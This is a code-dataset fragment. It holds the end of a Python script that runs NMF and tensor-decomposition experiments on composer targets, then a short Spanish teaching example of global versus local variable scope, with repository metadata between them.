"[6, 2, 3, 20]",
"[10, 2, 3, 20]",
"[3, 2, 3, 25]",
"[6, 2, 3, 25]",
"[10, 2, 3, 25]",
"[10, 13, 3, 375]",
"[10, 3, 3, 375]",
"[8, 13, 3, 375]",
"[6, 13, 3, 375]",
"[3, 13, 3, 375]",
"[1, 13, 3, 375]",
"[2, 13, 3, 375]",
"[4, 13, 3, 375]",
"[5, 13, 3, 375]",
"[4, 2, 3, 20]",
"[5, 2, 3, 20]",
"[4, 2, 3, 25]",
"[5, 2, 3, 25]",
]
dimensions = [3, 4]
# target_composers = [
# "Alexander Scriabin",
# "Claude Debussy",
# "Domenico Scarlatti",
# "Franz Liszt",
# "Franz Schubert",
# "Frédéric Chopin",
# "Johann Sebastian Bach",
# "Johannes Brahms",
# "Joseph Haydn",
# "Ludwig van Beethoven",
# "Robert Schumann",
# "Sergei Rachmaninoff",
# "Wolfgang Amadeus Mozart",
# ]
# targets = "[5,6]"
targets_list = ["[6,9]", "[0,4]", "[5,6]", "[9,12]", "[9,11]"]
for targets in targets_list:
# NMF experiment
for r in nmf_ranks:
try:
start_experiment_noclick(
reducers[0],
max_iter,
gpu_number,
targets,
dimensions[0],
r,
layer,
batch_size,
)
except Exception as e:
print("!!!!!!!!!!!")
print(e)
# NTD3 experiment
for r in ntd3_ranks:
try:
start_experiment_noclick(
reducers[1],
max_iter,
gpu_number,
targets,
dimensions[0],
r,
layer,
batch_size,
)
except Exception as e:
print("!!!!!!!!!!!")
print(e)
# NTD4 experiment
for r in ntd4_ranks:
try:
start_experiment_noclick(
reducers[1],
max_iter,
gpu_number,
targets,
dimensions[1],
r,
layer,
batch_size,
)
except Exception as e:
print("!!!!!!!!!!!")
print(e)
| 21.957143
| 62
| 0.386792
|
4a0f547aa0f50557b974e3303b6dd75d51830e32
| 171
|
py
|
Python
|
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | null | null | null |
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | null | null | null |
Modulo_1/semana2/variables_contantes/variables-afectando-alcance-variables.py
|
rubens233/cocid_python
|
492ebdf21817e693e5eb330ee006397272f2e0cc
|
[
"MIT"
] | 1
|
2022-03-04T00:57:18.000Z
|
2022-03-04T00:57:18.000Z
|
global texto
texto = "variable global" #variables globales
def funcion():
global texto
texto= "variable local" #variables locales
funcion()
print(texto)
| 21.375
| 54
| 0.695906
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.